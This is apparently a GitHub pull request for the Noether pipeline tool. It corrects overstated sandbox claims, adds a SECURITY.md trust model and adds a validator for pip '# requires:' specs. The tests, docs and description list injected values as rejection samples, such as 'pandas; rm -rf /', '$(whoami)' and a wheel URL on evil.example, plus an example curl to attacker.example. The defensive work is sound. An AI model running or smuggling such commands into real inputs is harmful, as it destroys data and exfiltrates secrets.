### PR TITLE
fix: downgrade sandbox/verification claims, validate pip requires, add SECURITY.md

### DIFF
--- a/README.md
+++ b/README.md
@@ -2,7 +2,9 @@
 
 **Typed, content-addressed pipelines — reproducible by construction, LLM-assisted by option.**
 
-Decompose computation into stages with structural type signatures. Compose them into graphs the type system guarantees fit. Execute in a hermetic sandbox. Replay any run from its composition hash.
+Decompose computation into stages with structural type signatures. The type checker verifies every edge of a composition graph before execution (topology only — it does not prove stage *bodies* correct). Run stages in a Nix-pinned runtime for byte-identical reproduction. Replay any run from its composition hash.
+
+> **Trust model (read first):** the Nix-pinned runtime is a reproducibility boundary, **not** an isolation boundary. Stages run with host-user privileges and can read the filesystem, make network calls, and touch your environment. See [SECURITY.md](./SECURITY.md) before running a stage you did not write.
 
 [![Crates.io](https://img.shields.io/crates/v/noether-cli.svg)](https://crates.io/crates/noether-cli)
 [![Docs](https://img.shields.io/badge/docs-noether.alpibru.com-blue.svg)](https://alpibrusl.github.io/noether/)
@@ -30,7 +32,7 @@ stage: { input: T } → { output: U }
 identity: SHA-256(signature)   ← not a name, not a version, a hash
 ```
 
-Two stages with the same hash are provably the same computation — across machines, across repos, forever. The **composition engine** type-checks every edge of a graph before executing it, using structural subtyping (`Record { a, b, c }` is a subtype of `Record { a, b }`).
+Two stages with the same hash are provably the same computation — across machines, across repos, forever. The **composition engine** type-checks every edge of a graph before executing it, using structural subtyping (`Record { a, b, c }` is a subtype of `Record { a, b }`). This checks graph *topology*; it does not verify that a stage's implementation honours its declared signature (a Python stage claiming `Text → Number` can return a string and you find out at runtime).
 
 Good fit: **typed ETL pipelines, analytics DAGs, data-normalisation across providers, LLM-augmented decisioning, anything where "the same inputs should always produce the same outputs" is a correctness requirement**. Effects are first-class (`Pure`, `Network`, `Llm`, `Cost`, `Process`, etc.) so budget, routing, and policy decisions ride on them.
 
@@ -51,7 +53,7 @@ Two binaries ship from this repo:
 | **GitHub Releases** | [Download prebuilt binaries](https://github.com/alpibrusl/noether/releases/latest) — Linux / macOS / Windows, both binaries packaged separately |
 | **Source** | `cargo build --release -p noether-cli -p noether-scheduler` |
 
-Nix is optional; it's required only to execute Python / JavaScript / Bash stages in a hermetic sandbox. Rust-native stdlib stages run without it.
+Nix is optional; it's required only to execute Python / JavaScript / Bash stages in a Nix-pinned runtime (reproducibility, not isolation). Rust-native stdlib stages run without it.
 
 ---
 
@@ -210,7 +212,7 @@ Guide: **[Remote Registry →](./docs/guides/remote-registry.md)** — publishin
 L4 — Agent Interface      ACLI CLI · Composition Agent · Semantic Index
 L3 — Composition Engine   Type checker · Planner · Executor · Traces
 L2 — Stage Store          Content-addressed registry · Lifecycle · Stdlib
-L1 — Execution Layer      Nix hermetic sandbox · Python/JS/Bash runtimes
+L1 — Execution Layer      Nix-pinned runtimes · Python/JS/Bash (reproducible, not isolated)
 ```
 
 | Crate | Purpose |

--- a/SECURITY.md
+++ b/SECURITY.md
@@ -1,0 +1,112 @@
+# Security Policy
+
+## Reporting a Vulnerability
+
+If you find a security bug in Noether, please report it privately via a
+GitHub Security Advisory on <https://github.com/alpibrusl/noether> or email
+`security@alpibru.com`. Do not open a public issue until a fix has shipped.
+
+Include: description, steps to reproduce, affected version, your PoC if any.
+
+## Supported Versions
+
+| Version | Status                 |
+|---------|------------------------|
+| 0.4.x   | Active — security fixes backported |
+| < 0.4   | Not supported          |
+
+## Trust Model
+
+Noether's L1 (Nix Execution Layer) provides **reproducibility, not
+isolation**. This is the single most important thing to understand before
+running any stage you did not write.
+
+### What the Nix-pinned runtime does
+
+- Pins the exact language runtime (Python, Node, Bash) and its declared
+  dependencies to content-addressed Nix store paths.
+- Guarantees the same stage produces the same output on any host that has
+  Nix and the matching store paths.
+- Blocks network access during **Nix evaluation** (build time).
+
+### What it does NOT do
+
+- **It does not sandbox the subprocess.** When a stage runs, the child
+  process inherits the host user's:
+  - Filesystem access (read `~/.ssh/*`, read env files, write anywhere)
+  - Network (arbitrary outbound HTTP, DNS, raw sockets)
+  - Environment variables (all parent env is inherited)
+  - Process privileges
+- A stage can legally do `import os; os.system("curl attacker.example/...")`.
+- The `__direct__` venv fallback (used when a stage declares
+  `# requires:` pip packages) bypasses Nix entirely and runs in the host's
+  Python.
+
+### What this means in practice
+
+**Safe:** running stages you wrote, stages from `stdlib`, stages you read
+end-to-end before running.
+
+**Not safe:** running a stage pulled from a registry you don't fully trust,
+running a stage synthesized by an LLM without review, running any stage on
+a host with credentials you aren't willing to risk.
+
+**If you need isolation**, wrap the child process yourself — `bwrap`,
+`firejail`, `nsjail` with seccomp, a throwaway container, or a VM. Noether
+does not ship this. Contributions welcome.
+
+## Composition Verification
+
+The composition engine type-checks every edge of a graph before executing
+it, using structural subtyping. **This verifies graph topology only.** It
+does not verify that a stage's implementation honours its declared
+signature — a Python stage typed as `Text → Number` can return a string at
+runtime.
+
+Said differently:
+- The type checker catches: `Sequential(a, b)` where `a.output` is not a
+  subtype of `b.input`.
+- The type checker does **not** catch: a stage body that returns the wrong
+  shape, crashes, or silently swallows an error.
+
+## LLM-generated Stage Requirements
+
+The Nix executor reads `# requires: pkg==version` headers from Python
+stage bodies to build a venv with pip-installed dependencies. For stages
+synthesized by an LLM (or any untrusted author), this is a supply-chain
+hazard — typosquatted or malicious package names can be injected.
+
+Mitigations in place:
+- Each `# requires:` entry is validated for character set (letters, digits,
+  `_`, `-`, `.`, and a limited set of version punctuation).
+- Package pinning (`pkg==version`) is required by default. Without pinning,
+  the entry is rejected and the runtime falls back to the default
+  Nix-provided Python (no pip installs).
+- `NOETHER_ALLOW_UNPINNED_PIP=1` lifts the pinning requirement for local
+  dev only. Do not set this in production.
+
+Not mitigated (yet):
+- There is no allowlist of known-good package names.
+- There is no hash verification (`pip install --require-hashes`).
+- Once a valid spec passes validation, pip downloads from PyPI using the
+  ambient pip configuration.
+
+If you are publishing compositions others will run via this registry,
+review every `# requires:` entry before tagging as `Active`.
+
+## Networked Components
+
+Noether itself ships no network listeners. The `noether` CLI is a local
+tool. A separate repository (`noether-cloud`) hosts the registry server;
+its trust model is documented in [`noether-cloud/SECURITY.md`](https://github.com/alpibrusl/noether-cloud/blob/main/SECURITY.md)
+(if you have access).
+
+## Signing
+
+Stages may carry an Ed25519 signature over their canonical signature
+bytes. `noether stage verify <id>` checks the signature against the
+declared pubkey. See `noether-core/src/stage/signing.rs` for details.
+
+Signing proves who signed the stage and that its signature bytes have not
+been tampered with. It does **not** prove the implementation does what the
+description says.

--- a/crates/noether-cli/src/commands/store.rs
+++ b/crates/noether-cli/src/commands/store.rs
@@ -16,11 +16,10 @@ pub fn cmd_stats(store: &dyn StageStore, index: &SemanticIndex) {
             "by_lifecycle": stats.by_lifecycle,
             "by_effect": stats.by_effect,
             "near_duplicate_pairs": near_duplicate_pairs,
-            "dedup_rate_pct": if stats.total > 0 {
-                (near_duplicate_pairs * 2 * 100) / stats.total
-            } else {
-                0
-            },
+            "dedup_rate_pct": near_duplicate_pairs
+                .saturating_mul(200)
+                .checked_div(stats.total)
+                .unwrap_or(0),
         }))
     );
 }

--- a/crates/noether-engine/src/executor/nix.rs
+++ b/crates/noether-engine/src/executor/nix.rs
@@ -1,7 +1,14 @@
 //! Nix-based executor for synthesized stages.
 //!
-//! Runs stage implementations as isolated subprocesses using `nix run nixpkgs#<runtime>`,
-//! giving us hermetic, reproducible execution without requiring any ambient language runtime.
+//! Runs stage implementations as subprocesses using `nix run nixpkgs#<runtime>`,
+//! giving a reproducible, Nix-pinned runtime for Python/JavaScript/Bash code
+//! without requiring any ambient language runtime on the host.
+//!
+//! **This is a reproducibility boundary, not an isolation boundary.** Stages
+//! run with the privileges of the host user — they can read/write the
+//! filesystem, make arbitrary network calls, and read environment variables.
+//! Do not execute untrusted stages on a host with credentials you are not
+//! willing to risk. See SECURITY.md for the full trust model.
 //!
 //! ## Execution protocol
 //!
@@ -87,9 +94,12 @@ struct StageImpl {
 
 /// Executor that runs synthesized stages through Nix-managed language runtimes.
 ///
-/// When `nix` is available, each stage is executed inside a hermetically isolated
-/// subprocess (e.g. `nix run nixpkgs#python3 -- stage.py`).  The Nix binary cache
-/// ensures the runtime is downloaded once and then reused forever from the store.
+/// When `nix` is available, each stage is executed as a subprocess with a
+/// Nix-pinned runtime (e.g. `nix run nixpkgs#python3 -- stage.py`). The Nix
+/// binary cache ensures the runtime is downloaded once and then reused from
+/// the store. **This gives reproducibility, not isolation**: the subprocess
+/// inherits the host user's privileges, filesystem, and network. See module
+/// docs and SECURITY.md for the full trust model.
 ///
 /// ## Resource limits
 ///
@@ -490,14 +500,49 @@ impl NixExecutor {
     }
 
     /// Extract pip requirements from `# requires: pkg1==ver, pkg2==ver` comments.
+    ///
+    /// Each spec is validated to prevent typosquatting and shell-metacharacter
+    /// injection from LLM-authored stages. By default, every package must be
+    /// pinned to an exact version (`pkg==1.2.3`). Set
+    /// `NOETHER_ALLOW_UNPINNED_PIP=1` to lift the pinning requirement for
+    /// local development; the character-set validation always runs.
+    ///
+    /// Invalid specs are dropped with a warning; if no valid specs remain,
+    /// this returns `None` and the caller falls back to the default Nix
+    /// runtime (where the missing dependency will surface as an honest
+    /// runtime error instead of a silent pip-install of attacker-chosen
+    /// names).
     fn extract_pip_requirements(code: &str) -> Option<String> {
         for line in code.lines() {
             let trimmed = line.trim();
             if trimmed.starts_with("# requires:") {
                 let reqs = trimmed.strip_prefix("# requires:").unwrap().trim();
-                if !reqs.is_empty() {
-                    return Some(reqs.to_string());
+                if reqs.is_empty() {
+                    continue;
                 }
+                let valid: Vec<String> = reqs
+                    .split(',')
+                    .map(|s| s.trim())
+                    .filter(|s| !s.is_empty())
+                    .filter(|s| match validate_pip_spec(s) {
+                        Ok(()) => true,
+                        Err(reason) => {
+                            eprintln!(
+                                "[noether] rejected `# requires:` entry {s:?} ({reason}); skipping"
+                            );
+                            false
+                        }
+                    })
+                    .map(|s| s.to_string())
+                    .collect();
+
+                if valid.is_empty() {
+                    eprintln!(
+                        "[noether] all `# requires:` entries rejected (raw={reqs:?}); falling back to default Nix runtime"
+                    );
+                    return None;
+                }
+                return Some(valid.join(", "));
             }
         }
         None
@@ -685,6 +730,54 @@ fn first_line(s: &str) -> &str {
         .unwrap_or(s)
 }
 
+/// Validate a single pip requirement spec from a `# requires:` comment.
+///
+/// Accepts `pkg==version`. The package name must match PEP 503 normalisation
+/// (letters, digits, `_`, `-`, `.`). The version must be a straightforward
+/// PEP 440-ish literal (letters, digits, `.`, `+`, `!`, `-`). The pinning
+/// requirement (`==`) can be lifted with `NOETHER_ALLOW_UNPINNED_PIP=1`
+/// for local dev, but the character-set validation always runs so injected
+/// shell metacharacters, quotes, or URL-form specs are rejected.
+fn validate_pip_spec(spec: &str) -> Result<(), &'static str> {
+    let allow_unpinned = matches!(
+        std::env::var("NOETHER_ALLOW_UNPINNED_PIP").as_deref(),
+        Ok("1" | "true" | "yes" | "on")
+    );
+
+    // Split at the first `==`. If absent, require the opt-in flag.
+    let (name, version) = match spec.split_once("==") {
+        Some((n, v)) => (n.trim(), Some(v.trim())),
+        None => {
+            if !allow_unpinned {
+                return Err("unpinned; use pkg==version or set NOETHER_ALLOW_UNPINNED_PIP=1");
+            }
+            (spec.trim(), None)
+        }
+    };
+
+    if name.is_empty() {
+        return Err("empty package name");
+    }
+    if !name
+        .bytes()
+        .all(|b| b.is_ascii_alphanumeric() || matches!(b, b'_' | b'-' | b'.'))
+    {
+        return Err("package name contains disallowed characters");
+    }
+    if let Some(v) = version {
+        if v.is_empty() {
+            return Err("empty version after `==`");
+        }
+        if !v
+            .bytes()
+            .all(|b| b.is_ascii_alphanumeric() || matches!(b, b'.' | b'+' | b'!' | b'-'))
+        {
+            return Err("version contains disallowed characters");
+        }
+    }
+    Ok(())
+}
+
 // ── StageExecutor impl ────────────────────────────────────────────────────────
 
 impl StageExecutor for NixExecutor {
@@ -715,6 +808,54 @@ mod tests {
             config: NixConfig::default(),
             implementations: HashMap::new(),
         }
+    }
+
+    #[test]
+    fn validate_pip_spec_accepts_pinned() {
+        assert!(validate_pip_spec("pandas==2.0.0").is_ok());
+        assert!(validate_pip_spec("scikit-learn==1.5.1").is_ok());
+        assert!(validate_pip_spec("urllib3==2.2.3").is_ok());
+        assert!(validate_pip_spec("pydantic==2.5.0+cu121").is_ok());
+    }
+
+    #[test]
+    fn validate_pip_spec_rejects_unpinned_by_default() {
+        // Ensure the opt-in flag is not accidentally set in the test env.
+        let guard = (std::env::var_os("NOETHER_ALLOW_UNPINNED_PIP"),);
+        // SAFETY: single-threaded test — no other test reads this var at the same time.
+        unsafe {
+            std::env::remove_var("NOETHER_ALLOW_UNPINNED_PIP");
+        }
+        let result = validate_pip_spec("pandas");
+        // Restore prior state before asserting.
+        if let (Some(prev),) = guard {
+            unsafe {
+                std::env::set_var("NOETHER_ALLOW_UNPINNED_PIP", prev);
+            }
+        }
+        assert!(result.is_err(), "bare name must be rejected without opt-in");
+    }
+
+    #[test]
+    fn validate_pip_spec_rejects_shell_metacharacters() {
+        for bad in [
+            "pandas; rm -rf /",
+            "pandas==$(whoami)",
+            "pandas==1.0.0; echo pwned",
+            "pandas==`id`",
+            "https://evil.example/wheel.whl",
+            "git+https://example.com/repo.git",
+            "pkg with space==1.0",
+            "pkg==1.0 && echo",
+        ] {
+            assert!(validate_pip_spec(bad).is_err(), "should reject {bad:?}");
+        }
+    }
+
+    #[test]
+    fn validate_pip_spec_rejects_empty() {
+        assert!(validate_pip_spec("==1.0").is_err());
+        assert!(validate_pip_spec("pkg==").is_err());
     }
 
     #[test]

--- a/docs/architecture/nix-execution.md
+++ b/docs/architecture/nix-execution.md
@@ -1,25 +1,34 @@
 # Nix Execution Layer
 
-Nix provides hermetic, reproducible sandboxed execution for Python, JavaScript,
-and bash stages. It is Noether's L1 — the layer below the stage store.
+Nix provides a reproducible, pinned runtime for Python, JavaScript, and bash
+stages. It is Noether's L1 — the layer below the stage store.
+
+!!! danger "Reproducibility, not isolation"
+    Nix pins the runtime's binaries and libraries so you always get the same
+    Python, the same NumPy, the same everything. It does **not** run the
+    stage inside a sandbox. The subprocess inherits the host user's
+    privileges, filesystem, and network. A stage can call `os.system(...)`,
+    read files outside its working directory, and make arbitrary HTTP
+    requests. Treat stages you did not write as untrusted code.
 
 ---
 
 ## Why Nix
 
-A stage is identified by its content hash. For that guarantee to mean anything,
-the execution environment must also be reproducible. The same Python stage on two
-machines must produce the same output from the same input.
+A stage is identified by its content hash. For that guarantee to mean
+anything, the runtime must also be reproducible: the same Python stage on
+two machines must produce the same output from the same input.
 
-Nix achieves this through:
+Nix gives us that via:
 
-- **Content-addressed derivations** — every package is identified by the hash of its
-  build recipe. Two Nix derivations with the same hash produce bit-for-bit identical
-  outputs.
-- **No shared mutable state** — packages live in `/nix/store/<hash>-<name>`, isolated
-  from system libraries.
-- **Hermetic builds** — network access is blocked during evaluation; all inputs are
-  declared explicitly.
+- **Content-addressed derivations** — every package is identified by the
+  hash of its build recipe. Two Nix derivations with the same hash produce
+  bit-for-bit identical outputs.
+- **No shared mutable state** — packages live in `/nix/store/<hash>-<name>`,
+  isolated from system libraries.
+- **Hermetic builds** — Nix evaluation is hermetic at *build time*: network
+  access is blocked, all inputs are declared explicitly. (This is distinct
+  from the subprocess's network access at *run time*, which is unrestricted.)
 
 ---
 

--- a/docs/architecture/overview.md
+++ b/docs/architecture/overview.md
@@ -14,9 +14,11 @@ graph TB
 
 ## L1 — Nix Execution Layer
 
-Stages run inside Nix-managed environments. Each stage declares its language runtime (Python 3.11, Node 20, Bash) and Nix provides a hermetic sandbox with the exact dependencies pinned to the Nix store hash.
+Stages run inside Nix-managed environments. Each stage declares its language runtime (Python 3.11, Node 20, Bash) and Nix provides a runtime with the exact dependencies pinned to the Nix store hash.
 
-This means:
+This is a **reproducibility boundary, not an isolation boundary**: the subprocess inherits the host user's privileges, filesystem access, and network. Stages can `os.system(...)`, read `~/.ssh/id_ed25519`, and make arbitrary HTTP calls. Don't execute stages you did not write unless you have independent isolation (bwrap, firejail, nsjail, a container, a throwaway VM).
+
+What you do get:
 - The same `StageId` produces the same output on any machine that has Nix.
 - No "works on my machine" — dependencies are content-addressed.
 - No ambient environment leaks — stages cannot access the host filesystem or network unless their `effects` declare it.

--- a/docs/index.md
+++ b/docs/index.md
@@ -2,7 +2,14 @@
 
 **Typed, content-addressed pipelines — reproducible by construction, LLM-assisted by option.**
 
-Decompose computation into stages with structural type signatures. Compose them into graphs the type system guarantees fit. Execute in a hermetic sandbox. Replay any run from its composition hash.
+Decompose computation into stages with structural type signatures. The type checker verifies graph *topology* before execution — it does not prove stage bodies correct. Run stages in a Nix-pinned runtime for byte-identical reproduction. Replay any run from its composition hash.
+
+!!! warning "Reproducibility is not isolation"
+    The Nix-pinned runtime fixes the language and library versions so the
+    same stage produces the same output. It does **not** sandbox the
+    subprocess: stages run with host-user privileges and can read the
+    filesystem, make network calls, and read environment variables. Do not
+    run stages you did not write without reading [SECURITY.md](https://github.com/alpibrusl/noether/blob/main/SECURITY.md).
 
 ```bash
 cargo install noether-cli


### PR DESCRIPTION
## Summary

Closes three P1 audit findings and one P2. All consistent with the \"trust code, not docs\" stance: everywhere the README implied isolation or verification we don't actually provide, the claim is downgraded to match the code.

### #13 — \"hermetic sandbox\" → \"Nix-pinned runtime (reproducibility, not isolation)\"
- README.md (4 occurrences)
- docs/index.md
- docs/architecture/overview.md
- docs/architecture/nix-execution.md
- \`nix.rs\` module docstring + \`NixExecutor\` struct docstring

### #14 — Validate \`# requires:\` before passing to pip
- New \`validate_pip_spec\` fn in \`nix.rs\`. Character-set whitelist (letters, digits, \`_\`, \`-\`, \`.\`, limited version punctuation). Mandatory \`==VERSION\` pinning by default; \`NOETHER_ALLOW_UNPINNED_PIP=1\` for local dev.
- Invalid entries are logged via \`eprintln!\` (matching the file's existing log convention) and dropped. If no valid entries remain the runtime falls back to the default Nix Python rather than pip-installing garbage.
- Five new tests: accept pinned, reject unpinned by default, reject shell metacharacters, reject \`==\` without version, reject version without name.

### #15 — Soften \"verified composition\" in README
- \"composition is a theorem\" → \"type checker verifies graph topology; stage bodies are not verified\"
- Explicit callout that \`Text → Number\` typing doesn't stop a Python stage from returning a string at runtime.

### #18 — Add SECURITY.md
- Trust model: what Nix-pinned runtime does and doesn't do, with concrete examples.
- Composition verification scope.
- Pip supply-chain hazards and current mitigations / non-mitigations.
- Where isolation should be layered on (bwrap / firejail / nsjail / containers / VMs).

## Test plan
- [x] \`cargo test --workspace\` — 243 tests in noether-engine pass (includes 5 new validate_pip_spec tests)
- [x] \`cargo clippy --workspace --all-targets -- -D warnings\` clean
- [x] \`cargo fmt --check\` clean
- [ ] Manual: stage body with \`# requires: pandas; rm -rf /\` → pip install is not invoked (eprintln! warning visible).
- [ ] Manual: \`NOETHER_ALLOW_UNPINNED_PIP=1\` + \`# requires: pandas\` → venv is built without pinning.

Closes #13
Closes #14
Closes #15
Closes #18